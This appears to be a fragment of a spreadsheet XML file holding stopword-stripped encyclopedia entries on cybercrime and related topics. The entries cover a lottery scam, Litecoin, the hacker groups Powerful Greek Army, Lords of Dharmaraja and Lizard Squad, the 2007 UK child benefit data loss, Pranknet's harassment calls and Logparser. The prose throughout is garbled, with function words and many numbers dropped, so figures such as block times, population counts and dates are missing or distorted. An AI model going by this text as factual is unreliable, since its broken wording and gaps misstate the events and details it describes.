scenario emails sent staff multinational corporation offices/branches throughout world using work email address. fraudsters represent agents scheme multinational won. example "winners" prize result placing advertisement supposed promoter scheme obscure (and sometimes fictional) trade magazine published equally obscure country. scammers allege written corporation's headquarters made every attempt pass "prize" without success, (the scammers) want lose face promoters anxious discharge responsibilities pass prize money, target's personal banking details allow "prize" sent trust target pass employers. this immediately makes target vulnerable phishing attack but, significantly, blackmail attempts. when refuse advance fraudsters threaten report matter employers and/or police. references external links world lottery association warns foreign lottery fraud risks, world lottery association rundown lottery scams lottery scams (information bureau consular affairs u.s. department state) lottery fraud (fbi)</t>
  </si>
  <si>
    <t>Litecoin</t>
  </si>
  <si>
    <t>litecoin (ltc decentralized peer-to-peer cryptocurrency open-source software project released mit/x11 license. inspired bitcoin, litecoin among earliest altcoins, starting october 2011. technical details, litecoin main chain shares slightly modified bitcoin codebase. practical effects codebase differences lower transaction fees, faster transaction confirmations, faster mining difficulty retargeting. underlying similarities bitcoin, litecoin historically referred "silver bitcoin's gold." 2022, litecoin added optional privacy features soft fork mweb (mimblewimble extension block) upgrade. history pre-litecoin 2011, bitcoin mining largely performed gpus. this raised concern users mining high barrier entry, resources becoming obsolete worthless mining. using code bitcoin, alternative currency created called tenebrix (tbx). tenebrix replaced sha-256 rounds bitcoin's mining algorithm scrypt function, specifically designed 2009 expensive accelerate fpga asic chips. this would allow tenebrix "gpu-resistant", utilize available resources bitcoin miners. tenebrix successor project earlier cryptocurrency replaced bitcoin's issuance schedule constant block reward (thus creating unlimited money supply). however, developers included clause code would allow claim million cost, criticized users.to address this, charlie lee, google employee would later become engineering director coinbase, created alternative version tenebrix called fairbrix (fbx). litecoin inherits scrypt mining algorithm fairbrix, returns limited money supply bitcoin, changes. creation launch noting earlier altcoins failed lack fairness, planned litecoin's launch intentionally avoid premining ninja mining. with intention creating "silver bitcoin's gold," litecoin developed combining good attributes previous cryptocurrencies avoiding pitfalls observed lee. after posting litecoin's defining features purpose, clarified launch procedure polled bitcointalk.org participants establish preferred launch time. improve miner distribution participation launch, established testnet compiled downloadable mining binary. released litecoin open-source client github october 2011. litecoin network went live october 2011. source code fork bitcoin core client, originally differing decreased block generation time (2.5 minutes), increased maximum number coins, different hashing algorithm (scrypt, instead sha-256), faster difficulty retarget, slightly modified gui. 2011–2016 after launch, early growth litecoin aided increasing exchange availability liquidity early exchanges btc-e. during month november 2013, aggregate value litecoin experienced massive growth included 100% leap within hours.in early 2014, suggested merge mining (auxpow) dogecoin litecoin dogecoin community large. september 2014, dogecoin began merge-mining litecoin, providing increased security dogecoin permanent block subsidy previously available litecoin mining. 2017–2021 2017, litecoin became first market cap) cryptocurrencies adopt segregated witness. later year, first lightning network transaction completed litecoin, transferring 0.00000001 zürich francisco second. 2020, paypal added ability users purchase derivative litecoin along bitcoin, ethereum bitcoin cash could withdrawn spent part crypto feature. september 2021, fake press release published globenewswire announcing partnership litecoin walmart. this caused price litecoin increase around 30%, press release revealed hoax. february 2022, litecoin reached marketcap $8.7 billion. 2022–present 2022, mweb (mimblewimble extension blocks) upgrade activated litecoin network soft fork. this upgrade provides users option sending confidential litecoin transactions, amount sent known sender receiver.in june 2022, paypal added ability users transfer litecoin along bitcoin, ethereum bitcoin cash paypal wallets exchanges. differences bitcoin litecoin different ways bitcoin: targeted block time every minutes litecoin, opposed bitcoin's minutes. this allows litecoin confirm transactions four times faster bitcoin. scrypt, alternative proof-of-work algorithm, used litecoin. differs bitcoin's sha-256 algorithm part including sequential memory-hard function, requiring asymptotically memory algorithm memory-hard. litecoin's scrypt algorithm, fpga asic devices made mining litecoin complicated create expensive produce bitcoin, uses sha-256. litecoin merge mined another prominent cryptocurrency (dogecoin), increasing miner compensation network security blockchains. litecoin maximum circulating supply 84,000,000 ltc, four times larger bitcoin's maximum circulating supply 21,000,000 btc. both litecoin bitcoin retarget mining difficulty every 2016 blocks. however, faster block speed litecoin, mining difficulty retargets occur approximately every days. this compares approximately every days bitcoin. mweb optional privacy added litecoin's base layer 2022 soft fork. this allows amounts held within wallets transaction amounts within mweb private.third party vendors providing point sale infrastructure litecoin include companies verifone, bitpay, coingate. bitpay added support litecoin 2021, litecoin initially accounting less bitpay transactions. june 2022, litecoin grown represent bitpay transactions payment count. also list scrypt crypto currencies notes references external links litecoin foundation</t>
  </si>
  <si>
    <t>Powerful Greek Army</t>
  </si>
  <si>
    <t>powerful greek army abbreviation "pga" hacker group founded 2016. team carried numerous cyberattacks greece worldwide. notable attacks november 2016, member named kapustkiy breached high commission websites india, accessing login information hundreds users.in september 2016, group started campaign #opclosedmedia, targeting news media organizations around world, mainly denial-of-service attacks.in december 2016, group took website prime minister greece.after years inactivity twitter, attack april 2020, getting access school network greece, largest public network connects schools, teachers number administrative services supervised bodies ministry, leaking data control. data included usernames, passwords, country residence, street addresses, phone numbers, sensitive data stored system. group's main message "they wanted warn greek government". breach also used opposition (and second popular political party greece) syriza form confrontation.again, april 2020, hacked twitter account odysseas konstantinopoulos, famous greek politician, former spokesman pasok, vice president greek parliament tweeting things like: this last warning greek government.in 2020, defaced institute sociological political legal research north macedonia, also claimed hacked north macedonia's ministry economy ministry finance, exposing posting employees' personal information public. according official statement government republic north macedonia, data hackers published old. they also added evidence moment e-mail systems hacked, minister economy kreshnik bekteshi explained damage done" informed ministry's department told serious confidential data stolen. some days attack, group's twitter account taken down.in august 2020, took offline biggest banks turkey, including, halkbank, ziraat bank, i̇şbank, denizbank, yapı kredi, akbank. they also downed websites turkish airlines president turkey.in january 2022, group hacked twitter account nasa director parimal kopardekar. exact reason unknown, claimed looking someone works nasa.in february 2022, group started operation opendmacedonia, attacked important computer systems north macedonia websites government, ministry foreign affairs, country's central bank, makedonski telekom news media. group also hacked ministry education science (north macedonia), posting hacked database, claiming "have access even camera systems, watch 24/7, eyes everywhere skopje". ministry confirmed hacking attack, said camera surveillance system theirs. some weeks after, managed banking system north macedonia, temporarily taking offline banks north macedonia. national bank north macedonia confirmed attacks. aftermath, north macedonia signed memorandum understanding agreement nato strengthen response cyber attacks. references</t>
  </si>
  <si>
    <t>Loss of United Kingdom child benefit data (2007)</t>
  </si>
  <si>
    <t>loss united kingdom child benefit data data breach incident october 2007, computer discs owned revenue customs containing data relating child benefit went missing. incident announced chancellor exchequer, alistair darling, november 2007. discs contained personal details families united kingdom (uk) claiming child benefit, takeup near 100%. loss discs sent junior staff revenue customs (hmrc) based waterview park washington, tyne wear, national audit office (nao), unrecorded internal mail october. october complained hmrc received data. november, senior officials hmrc informed loss, chancellor exchequer, alistair darling informed november. november darling announced: password-protected discs containing full copy hmrc's entire data relation payment child benefit sent hmrc's internal post system operated courier tnt. package recorded registered. appears data failed reach address nao. lost data thought concern approximately million people (nearly half country's population). personal data missing discs reported include names addresses parents children dates birth children, together national insurance numbers bank building society details parents.the "password protection" question provided winzip version this weak, proprietary scheme (unnamed encryption hash algorithms) well-known attacks. anyone competent computing would able break protection downloading readily-available tools. winzip version introduced encryption, would secure breakable correctly knowing passphrase. list frequently asked questions, news website breakdown loss reported being: 7.25 million claimants 15.5 million children, including longer qualify whose family claiming younger child 2.25 million 'alternative payees' partners carers 3,000 'appointees' claim benefit court instructions 12,500 agents claim benefit behalf third partywhilst government ministers claimed junior official blame, conservatives said fault part senior management. this based claim national audit office requested bank details removed data sent, hmrc denied request, would "too costly complicated". emails released november confirmed senior hmrc officials made aware decision cost grounds strip sensitive information. cost removing sensitive information given £5,000. although cost found substantially less (£650) academic study.according trade journal computer weekly, said back march 2007, asked completed information child benefit database sent post cds, instead sample database. first time done, things went smoothly, package registered post. however time, unregistered courier.it later revealed, december 2007, data protection manual hmrc restriction senior members staff, junior civil servants summary manual says security. other data scandals this followed several data scandals. december revealed ruth kelly details three million learner drivers lost united states. however details said lost the: name, address, phone number, paid, test centre, payment code e-mail, much panic caused reduced risk financial fraud. december revealed nine national health service (nhs) trusts also lost data hundreds thousands patients, archive information, medical records, contact details soft financial data. trusts also lost data, found fairly quickly. several firms also admitted security failings. response darling stated indication details fallen criminal hands, urged affected monitor bank accounts. said someone innocent victim fraud result incident, people assured protection banking code suffer financial loss result." hmrc child benefit helpline concerned data loss. incident breach uk's data protection resulted resignation hmrc chairman paul gray; darling commented discs probably destroyed "the hunt probably within days" "opaque" management structure hmrc difficult responsible what. gray subsequently found working cabinet office. metropolitan police independent police complaints commission investigated security breach, uniformed police officers investigated hmrc offices. loss much criticism acting leader liberal democrats vince cable shadow chancellor george osborne. osborne said: clear scale catastrophic mistake— names, addresses dates birth every child country sitting computer discs apparently lost post, bank account details national insurance numbers million parents, guardians carers gone missing. addition said "final blow ambitions government create national database". cable also criticised disks modern electronic data transfer. spokespersons gordon brown, however, said prime minister fully supported darling, said darling expressed intention resign.the general reaction public anger worry. banks, individuals, businesses government departments became vigilant data fraud identity theft government pledged careful data. public media particularly angry fact data registered recorded, securely encrypted. nick assinder, political correspondent bbc, expressed opinion believed darling borrowed time". george osborne, questioned whether darling job", suggested would matter days decision made regarding darling's future. however darling remained chancellor labour's defeat 2010. stated that, delivery recorded, would possible even ascertain actually sent, alone went. jeremy clarkson direct debit fraud january 2008, jeremy clarkson found subject direct debit fraud publishing bank account sort code details column make point public concern scandal unnecessary. wrote, “all able money account. take out. honestly, i've never known palaver nothing”. someone used details £500 direct debit charity diabetes next sunday times column, clarkson wrote, wrong punished mistake.″ under terms direct debit guarantee, payment could reversed. also list government data losses united kingdom government security breaches references external links alistair darling's statement parliament hmrc letter apology brown apologizes records loss, timeline events</t>
  </si>
  <si>
    <t>Livedrive</t>
  </si>
  <si>
    <t>livedrive online cloud backup sync storage service owned global. company provides users unlimited backup space 2,000 sync storage. livedrive enables users access data mobile phones tablets. currently livedrive apps ios, android, windows, macos chrome history livedrive founded late 2008 andrew michael. another investor company nicholas cowell.in october 2009 livedrive entered market place distribution agreement lifeboat distribution international speciality software distribution security, application lifecycle, virtualization network infrastructure products.in april 2011, livedrive created april fools video falsely stated company storing files paper using codes. story picked several press sources true story including cbs's money watch.on february 2014, livedrive purchased global. livedrive part j2's business cloud services division, includes efax, evoice, fusemail, campaigner, keepitsafe.after shutting hundreds user accounts “excessive bandwidth/storage”, livedrive reported august 2014 facing legal action discontented customers. media streaming september 2010, livedrive added personal music movie streaming accounts. this gave users ability listen music collections watch movies remote computer, transcoding handled livedrive. company also gave users access unlimited versioning. references</t>
  </si>
  <si>
    <t>BattleHack</t>
  </si>
  <si>
    <t>battlehack battle hack 2013 series) series global hackathon contests organised paypal. competitors required solve local problem coding. winners first prize contest trophy, admission world finals competitors competed $100,000 grand prize. competitors retain ownership applications made contests.in 2016 paypal/braintree shut developer relations program along related programs battlehack.it announced battlehack would returning however 2018 domain name lapsed since moved ownership. also hackathon references external links official website</t>
  </si>
  <si>
    <t>Pranknet</t>
  </si>
  <si>
    <t>pranknet, also known prank university, canadian-based anonymous prank calling virtual community involved string malicious pranks instances telephone harassment, especially 2009–2011. their pranks coordinated online chat room, convinced others cause damage hotels fast food restaurants $60,000. group founded later referred "dex1x1", later identified canadian named tariq malik. group linked nearly separate incidents.posing authority figures, fire alarm company representatives hotel front-desk/corporate managers, pranknet participants called unsuspecting employees customers united states tricked damaging property, pulling fire alarms, setting fire sprinklers, breaking windows, humiliating acts disrobing consumption human urine. pranknet members could listen real-time discuss progress together private chat room.in 2009, wave pranks across united states prompted internal alerts choice hotels, well advisories sheriff's office orange county, florida, others. time, enforcement officials number jurisdictions federal bureau investigation began investigating various incidents well identity "dex". technology pranknet initially operated chat room pranknet.org, participants used skype make calls. 2009, skype used encryption obfuscation communication services provided uncontrolled registration system users without proof identity, making difficult trace identify users. after skype began internal investigation, pranknet left skype briefly used paltalk chats calls. however, paltalk banned pranknet february 2009 incident. after pranknet users banned paltalk, company subjected multiple ddos attacks. beginning 2009, members chatted before, during, prank chat system beyluxe messenger, owned operated romania, thus outside north america. audiences ranged people given time. pranks created sufficient havoc posted youtube. updates also provided twitter account. notable pranknet incidents february 2009, "dex" member called "slayer" called restaurant manchester, hampshire. posing manager corporate office, persuaded employees douse building fire suppression chemicals proceed outside, remove clothing urinate other. claimed chemicals caustic would render inert. when "dex" posted audio youtube described "epic prank call (greatest ever)...dex successfully convinces female employees undress fully nude outside urinate other." many months later "dex", posing time insurance adjuster, called victims describe experiences pranknet members listened.on february "dex" member called "dta_mike", posing hotel front desk employees, called separate guests best western hotel shillington, pennsylvania. using pretense ruptured line, caller persuaded guest break window throw television out. "dex" friend repeated stunt february best western santee, california.on april pranknet member called "rollin called prejean's restaurant lafayette, louisiana posing official health department. this target selected restaurant provided live video streaming dining area website. victim restaurant told prejean's pork tainted swine flu. "rollin also told manager close restaurant immediately tell customers them) eaten tainted food.on "dex" called hampton york, nebraska, tricked employee setting fire alarm. guests made lobby, second call placed front desk. "dex" claimed that, avoid alleged fines, fire department called. instead, caller gave various bogus instructions turn alarm off, including going website displayed pornography. next suggestion caller break front windows hotel. truck driver staying hotel volunteered, direction "dex", drove semi-trailer truck front door. later night, "dex" tweeted: pulled epic prank. hotel guest back truck hotel front window lobby), break window." post deleted late july.on june 2009, prank made holiday express hotel conway, arkansas. caller posed representative company installed hotel's fire sprinkler claimed system needed reset pulling fire alarm. once alarm turned clerk told sprinklers would activate unless windows broken. day, pranksters called comfort suites gadsden, alabama, persuading clerk pull fire alarm; sprinklers subsequently activated, causing water damage.in july, pranknet member called hilton orlando, florida, and, claiming leak, convinced family staying break windows toilet tank throw mattress window. incident cost $5,000 damages.also july, pranknet caller informed hotel guests deadly spiders infest room. caller able manipulate couple breaking window tank toilet.on july pranknet members powell markle called arby's baytown, texas (where powell lives) talked worker triggering fire suppression system, causing estimated $4,600 damages. powell failed attempts windows broken. powell later arrested charged criminal mischief incident.on july markle tricked desk clerk homewood suites lexington, kentucky, drinking another person's urine. prank started call guest. guest told front desk calling prior guest tested positive hepatitis guest told doctor site simple urine test could determine guest infected. urine brought front desk simple drinking glass. switching roles, markle called front desk alleging employee martinelli's cider. told clerk representative company would like come downstairs sample drink. guest previous call arrived handed clerk urine. markle coaxed woman asked tasted. "horrible", said. "that taste like cider. going take another sip, that's horrible." markle replied: "well, need inform something, ma'am. want understand drank man's urine." investigation, cyber crimes division police department lufkin, texas, requested subpoena markle's skype activities. police report classifies lexington incident first-degree wanton endangerment, class felony kentucky. markle subsequently sentenced shock incarceration term months.additionally, employee holiday express persuaded pranknet caller fire alarm, break windows, sprinklers flooded building. damages estimated $50,000.the smoking reported pranknet leader "dex" responsible october hoax phoned espn reporter elizabeth moreau, tricking breaking windows room hilton garden gainesville, florida. initiated conference call front desk employee hotel, claimed moreau's boyfriend damage result fighting, well making number vulgar statements. result hoax, gainesville police detective assigned case.in november 2010, elderly staying motel spartanburg, south carolina, tricked pranknet member posing hotel administrator destroying television smashing mirrors room wrench destroy hidden cameras supposedly left previous guest. man, told "midget" trapped adjoining room, tricked destroying sheetrock wall behind room door, almost making next room. prankster's returned calls heard police guests received prank calls soon called front desk, hotel hold accountable damages, leave. pranksters called back march 2011, persuading guest "disable" sprinkler head smashing toilet prevent 'toxic gas' entering room. according tsg, "motel preferred target pranknet members call directly rooms without know guest's name" november 2011, longer possible. after police arrived answer call placed motel manager, declined press charges victim noted similar phone calls received motel.on december 2010, pranknet members identified smoking collaborated humiliate iraq veteran, motel amarillo, texas. one, posing hotel receptionist, informed prior occupant room diagnosed "h1n1 virus", transferred other, posing physician, course half hour directed induce vomiting, consume urine "kill incubation period", finally collect stool sample pillowcase, bring front desk. prankster called hotel's actual front desk, identifying guest's full name claiming angry service would leave pillowcase full feces front desk. receptionist locked door called police, veteran returned room, conversation police officers receptionist summoned became audible pranksters' followers. they finished calling visitors hotel describing aspects prank police called half hour later. with voice electronically altered posing mother making prank calls, pranksters managed convince police victim back phone, unknowingly recounted experience pranksters.on january 2011, holiday omaha, nebraska, targeted. taking advantage ability call guests hotel directly, prankster pretended fire department employee reading instructions computer checklist prevent explosion leak. these instructions included "break glass vial sprinkler", leading $115,000 water damage seven guest rooms conference room. guest also persuaded mirror wall find (nonexistent) shutoff valve. phone computer hijacking beginning july 2009, "dex" began hijacking phone numbers u.s. businesses forwarded skype account. claiming authority particular business, calls phone company claims dial tone. requests calls forwarded number provides.on july "dex" took incoming calls olympic game farm port angeles, washington, making obscene sexual comments customers called. july repeated stunt amusement park chula vista, california. july took incoming calls best western jacksonville, florida hours. interaction, woman called find husband arrived told first accident, room wish disturbed. july "dex" controlled incoming calls hilton garden tulsa, oklahoma. told people inquiring shuttle take they'd reimbursed. told callers hotel swine outbreak told callers hotel midst hostage situation.talking hotel front desk clerks series steps using teamviewer, "dex" posed corporate headquarters supervisor taken remote control hotel computers. craigslist abuse pranknet members frequently placed craigslist offering free tickets items. inquirers bombarded obscene sexual rants racial epithets. 12-year-old girl called free trampoline, "dex" told pregnant black "they aids". markle frequently called women selling household items site, getting home addresses victims, told rape kill children. smoking investigation "dex" pranknet members regularly taunted victims others, saying untraceable. interview smoking june 2009, "dex" exhibited worries tracked caught. july co-interview markle, boasted: "it's difficult find ghost internet. pretty much everything keep anything computer would lead back actual computer. stupid individual, like said."in june 2009, smoking launched investigation lasted nearly months included travel windsor, ontario stakeout outside malik's mother's home. smoking editor william bastone emailed "dex", skype interview provided urls smoking website. urls unique; malik viewed them, revealed address location. names, biographies locations pranknet's founder "dex" number prolific members, findings, published website provided august 2009. 2016 article noted bastone's outing pranknet's members also referred pranknet "long gone". members according crime reporting website smoking gun, members included: tariq malik, also known pranknet leader "dex" tribute character dexter morgan, fictional serial killer). interview globe mail, "dex" denied malik (but confirmed canadian). william marquis, pranknet's "second command". known hempster, marquis previously convicted 2004 drunk driving 2005 marijuana production. news attempted interview marquis regarding pranknet allegations. however, answer door. james "tyler" markle, group's prolific callers. markle already person interest lufkin police investigation involving phone call local mcdonald's, arrested subsequently. smoking based claim upon information myspace facebook pages, people area identified markle photos. smoking also published official documents showing markle pleaded guilty aggravated sexual assault child 2005, serving years juvenile detention facility 5-year-old girl threatening kill told anyone incident. interview lufkin daily news, markle denied person described him, claiming instead another person called samoan prankster. charged felonies separate states: making felony terroristic threat lufkin mcdonald's case terrorizing criminal damage (both felonies) separate incident involving wendy's restaurant gretna, louisiana. later extradited louisiana result charges filed gretna incident. december 2010, markle sentenced years imprisonment texas prank call lufkin mcdonald's. shawn powell, previously imprisoned indecency minor (for taking nude photos 8-year-old female relative), felony custody months. specialized racist threatening calls. charged criminal mischief part hoax call baytown arby's restaurant, resulting fire suppression system activated resulting $1,350 worth damage. leeann jordan, used paypal account receive international money transfers paltalk.a former member, jericho batsford, left group 2009 incident conway, arkansas, contacted local agents. told knew dex's identity malik responsible many incidents. response defection, pranknet members constantly harassed home workplace skype beyluxe. malik told members patient, would answer phone her, instead "get later road, least expects it." batsford participated phone pranks, left witnessed members encouraging children make bomb threats.officials least four u.s. states u.s. cities stated considering charges "dex" possible extradition canada face trial. references external links details, incident report photos conway, arkansas incident incident report comfort suites incident orange county sheriff bulletin regarding pranks</t>
  </si>
  <si>
    <t>Lords of Dharmaraja</t>
  </si>
  <si>
    <t>lords dharmaraja name hacker group, allegedly operating india. this group came limelight threatening release source code symantec's product norton antivirus, allegations government india "arm-twisting" international mobile manufacturers united states-china economic security review commission(uscc). symantec confirmed symantec endpoint protection 11.0 symantec antivirus 10.2 version source code compromised obtained group, united states authorities still investigating allegations suspecting india's hand spying.this group alleged, hacked posted threat uploading secret documents, memos, source code symantec's product pastebin website renowned source code snippets upload several users, public viewing. group, seems, uploaded secret documents, revealing indian government arm-twisting international mobile manufacturers like rim, apple, nokia assist spying uscc. addition these, group seems claimed discovering source code related dozen software companies, signed agreements indian tancs programme cbi.after hacker's posted threats, christopher soghojan, security privacy researcher usa, tweeted: "hackers leak indian military intel memo suggesting apple provided intercept backdoor govs". also provided links gallery images documents. documents appear related tactical network cellular surveillance (tancs), technical agreement mobile manufacturers, email communication stuff associated members uscc. their claims reported times india article, group posted statement pastebin website saying, now, start sharing brothers followers information indian militaty [sic] intelligence servers, far, discovered within indian programme source codes dozen software companies signed agreements indian tancs programme cbi."the group also said, "now release confidential documentation encountered symantec corporation norton antivirus source code going publish later working mirrors since experience extreme pressure censorship india government agencies."when correspondent times india tried reach alleged member lords dharamraja name "yamatough," reply. yamatough also twitter account; wherein, described "anonymous [avenger] indian independence frontier." allegations cyber spying reported times india article, based uploaded secret memos dated october 2011, international mobile manufacturers like rim, apple, nokia along domestic micromax given "backdoor access" digital surveillance indian military intelligence officials exchange business indian market. memo, decision also made sign agreement mobile manufacturers exchange "business presence" indian market military intelligence access united states chamber commerce's communication gateways like servers, etc. memos reveal "backdoor" allegedly used indian intelligence uscc.as reported rediff.com article based leaked documents, indian army's intelligence military intelligence along central bureau investigation(cbi) performing bilateral cellular internet surveillance operations right april 2011. later, july 2011, meeting sub-committee military intelligence, detailed cyber defence plan 2011 prepared subsequently military intelligence-central bureau investigation "joint operations" conducted daily.another article register based uploaded documents says, "cycada" data intercept team operation networks using backdoors provided mobile manufacturers. also says leaked memos elicit conversations members uscc currency issues discussions western firms actions assisting chinese aircraft industry improve "avionics" engine manufacturing too.as reported news agency reuters, uscc officials asked "concerned authorities investigate matter" dispute authenticity intercepted mails pointing "backdoor channel" evident leaked documents. also reported hindustan times, jonathan weston, spokesman uscc, said aware reports contacted relevant authorities investigate matter." apparently, authorities investigating allegations pointing indian government's spy-unit hacking emails official panel monitors economic security relations united states china.mobile manufacturer officials, less, refused comment issue, times india contacted relevant spokesmen authorities. alan hely, senior director corporate communications apple inc., refused comment leaked documents, denied backdoor access provided. too, refused comment leaked memos rumors speculations, register contacted them; besides, countered saying, deals specific countries ability provide customer's encryption keys." spokesman nokia quoted saying, "the company takes privacy customers data seriously committed comply applicable data protection privacy laws."speaking rediff.com phone, indian army denied reports spying uscc mobile companies; however, military spokesman said uploaded documents fact forged malicious intent. symantec's anti-virus source code hacker's group threatened publish entire source code norton antivirus, symantec's product, allegedly stolen group discovered hacking servers associated india's military intelligence. weight threats, group posted hacked source code pastebin. imperva, data security company, commented hacker group's claims threats would potentially embarrassment symantec's part. rachwald imperva speculated hacker group might retrieved files files probably resided "test server" posted ftp; consequently, exposing mistakenly became public unintentionally negligence. said that, "governments require source code vendor products prove product spyware".symantec initially, tried douse fears saying documentation preview code nothing special; accordingly, chris paden symantec said published data documents symantec's documentation every software vendor, including symantec share client, including governments. eventually, symantec confirmed source code symantec endpoint protection 11.0 symantec antivirus 10.2 compromised hacker group. also list fictional hackers list notable hackers references external links cnn-ibn ibnlive fake memo real code? india-us hacking mystery deepens news symantec advises disabling pcanywhere software blueprints msnbc.com symantec says anti-virus source code stolen years businessworld india-us hacking mystery deepens zdnetasia.com india allegedly hacks us-china trade watchdog wordpress.com lords dharmaraja hacking group claim access part symantec's norton source code jordandirections.com symantec: parts antivirus source code forbes.com lords kings hack norton antivirus, safe? symantec.com security community blog siliconindia news indian hackers: threat symantec, wreak havoc cnet.com hackers release source code symantec's pcanywhere rediff.com hacking group's target sunil mittal, wants 'pro-us' govt news indian intelligence have u.s. government passwords, hackers claim eweek security watch hackers' threat publish symantec source code reason worry times india hackers expose symantec source code hacking news indian hacker group 'lords dharmaraja' offers help suing symantec york times hackers threaten post source code symantec product hindustan times indian hackers offer help suing symantec</t>
  </si>
  <si>
    <t>Liverpool pound</t>
  </si>
  <si>
    <t>liverpool pound refers various types local currencies used liverpool, united kingdom. history between 1793 1796, order solve local financial crisis liverpool corporation gained permission house commons distribute banknotes denominations £100. today versions original notes displayed liverpool museum. 2017 israeli technology company colu launched liverpool local pound, digital currency accessible smartphone offers discounts businesses liverpool. references external links liverpool local pound liverpool pound</t>
  </si>
  <si>
    <t>Lizard Squad</t>
  </si>
  <si>
    <t>lizard squad black hacking group, mainly known claims distributed denial-of-service (ddos) attacks primarily disrupt gaming-related services. september 2014, lizard squad seemingly announced disbanded return later claiming responsibility variety attacks prominent websites. organization point participated darkode hacking forums shared hosting them.on april 2016, cloudflare published blogpost detailing cyber criminals using group's name issuing random threats carrying ddos attacks, despite threats, cloudflare claim failed carry single attack. result this, city london police issued alert warning businesses comply ransom messages threatening ddos attacks. distributed denial-of-service attacks distributed denial-of-service (ddos) attack occurs numerous systems flood bandwidth resources targeted system, usually servers. such attack often result multiple systems (for example botnet) flooding targeted system traffic. when server overloaded connections, connections longer accepted. notable actions league legends ddos august 2014, servers game league legends taken offline ddos attack; claimed lizard squad's first attack. destiny ddos november 2014, lizard squad claimed attacked destiny servers ddos attack. playstation network ddos august 2014, playstation network disrupted ddos attack, december lizard squad claiming responsibility. xbox live ddos december 2014, xbox live apparently attacked lizard squad: users attempting connect service would given 80151909 error code. machinima hack december 2014, lizard squad hacked machinima.com, replacing front page ascii logo. north korea ddos december 2014, internet north korea taken offline ddos attack. lizard squad claimed responsibility attack linked address located north korea. north korean internet services restored december 2014. christmas attacks lizard squad previously threatened take gaming services christmas.on december 2014 (christmas day), lizard squad claimed performed ddos attack playstation network xbox live. december 2014, 2:00 lizard squad appeared stop attacking playstation network xbox live. gizmodo reported attacks ceased dotcom offered lizard squad 3000 accounts upload service mega. sybil attack december 2014, sybil attack involving 3000 relays attempted network. nodes names beginning "lizardnsa" began appearing, lizard squad claimed responsibility attack.the relevance attack questioned. according relay node operator thomas white, consensus system made lizard squad managed control "0.2743% network, equivalent tiny vps". malaysia airlines website attack january 2015, website malaysia airlines attacked, apparently lizard squad, calling "cyber caliphate". users redirected another page bearing image tuxedo-wearing lizard, reading "hacked cyber caliphate". underneath text reading "follow cyber caliphate twitter" twitter accounts owner umg, "@umgrobert" umg, "@umg_chris". page also carried headline "404 plane found", apparent reference airline's loss flight mh370 previous year. malaysia airlines assured customers clients customer data compromised.media reports around world said versions takeover regions included wording "isis prevail", listed concerns lizard squad's association islamic state. daybreak games ddos july 2015, game servers operated daybreak game company, including h1z1 planetside disrupted ddos attack lizard squad claimed responsibility for. attack performed retaliation legal threats john smedley, company's ceo, made targeted hacking group. false claims bomb threats august 2014, lizard squad claimed plane president sony online entertainment, john smedley, flying (american airlines flight 362), explosives board. flight dallas diego made unscheduled landing phoenix, arizona. sony online entertainment announced investigating incident. facebook, instagram, tinder attack january 2015, several social media services including facebook instagram unavailable users. tinder hipchat also affected. lizard squad claimed responsibility attacks, posting twitter account previously used group. outage, originally speculated distributed denial-of-service attack, lasted little hour services restored.facebook later released statement saying engineers blame, disruption services result third-party attack, instead occurred introduced change affected configuration systems. explicit celebrity photos january 2015, lizard squad claimed compromised taylor swift's twitter instagram accounts. once claimed access, threatened release nude photos exchange bitcoins. taylor swift, however, retorted "there naked pics" told offenders "have fun" finding any. conspiracy theory january 2021, american lawyer conspiracy theorist wood tweeted baseless claims group hackers named "the lizard squad" evidence global ring involving several high-profile americans, similar discredited conspiracy theory qanon. there seems relation "lizard squad" mentioned wood black-hat hacking group lizard squad, vinnie omari, member lizard squad, refutes claim group information global sex-trafficking organization. known members vinnie omari vinnie omari member lizard squad arrested bailed alleged offences "enter into/concerned acquisition/retention/use control criminal property, fraud false representation fraud 2006, conspire steal another, unauthorized computer access intent commit offences". used public face television spokesperson news represent lizardsquad. julius kivimäki julius kivimäki (zeekill) finnish member lizard squad convicted july 2015 50,000 counts computer crime. zachary buchta 19-year-old zachary buchta (fbiarelosers) maryland, charged computer crimes associated series distributed denial-of-service (ddos) attacks, stolen credit cards selling ddos-for-hire services. members behind lizardsquad also co-group "poodlecorp" launched distributed denial-of-service (ddos) attacks multiple networks, youtubers gaming services. buchta hiding behind twitter alias @fbiarelosers, @xotehpoodle, online aliases "pein" "lizard". bradley willem rooy 19-year-old bradley willem rooy (uchihals) netherlands, charged computer crimes associated series distributed denial-of-service (ddos) attacks, stolen credit cards selling ddos-for-hire services. members behind lizardsquad mainly responsible launching ddos-attacks announced group. also managers behind twitter account @lizardlands main twitter account lizardsquad since january 2015. normally hiding behind twitter alias @uchihals (which stands uchiha lizardsquad) online aliases "uchihals", "uchiha" "dragon". references</t>
  </si>
  <si>
    <t>Logparser</t>
  </si>
  <si>
    <t>logparser flexible command line utility initially written gabriele giuseppini, microsoft employee, automate tests logging. intended windows operating system, included resource tools. default behavior logparser works like "data processing pipeline", taking expression command line, outputting lines containing matches expression. microsoft describes logparser powerful, versatile tool provides universal query access text-based data files, files files, well data sources windows operating system event log, registry, file system, active directory. results input query custom-formatted text based output, persisted specialty targets like sql, syslog, chart. common use: logparser &lt;options&gt; &lt;sql expression&gt; example: selecting date, time client username accessing aspx-files, taken .log-files current directory. logparser -i:iisw3c "select date, time, cs-username from *.log where cs-uri-stem like '%.aspx' order date, time;" references external links parser lizard logparser parser studio utility logparser logparser forums logparser forums microsoft logparser overview page archived page. logparser download professor windows 2005 parser works gabriele giuseppini examples (sql) queries analysis under hood logparser jeff atwood visual parser logparser parser plus queries/tutorials help analyze logs logparser.oledb oledb input format plugin</t>
  </si>
  <si>
    <t>1mdc</t>
  </si>
  <si>
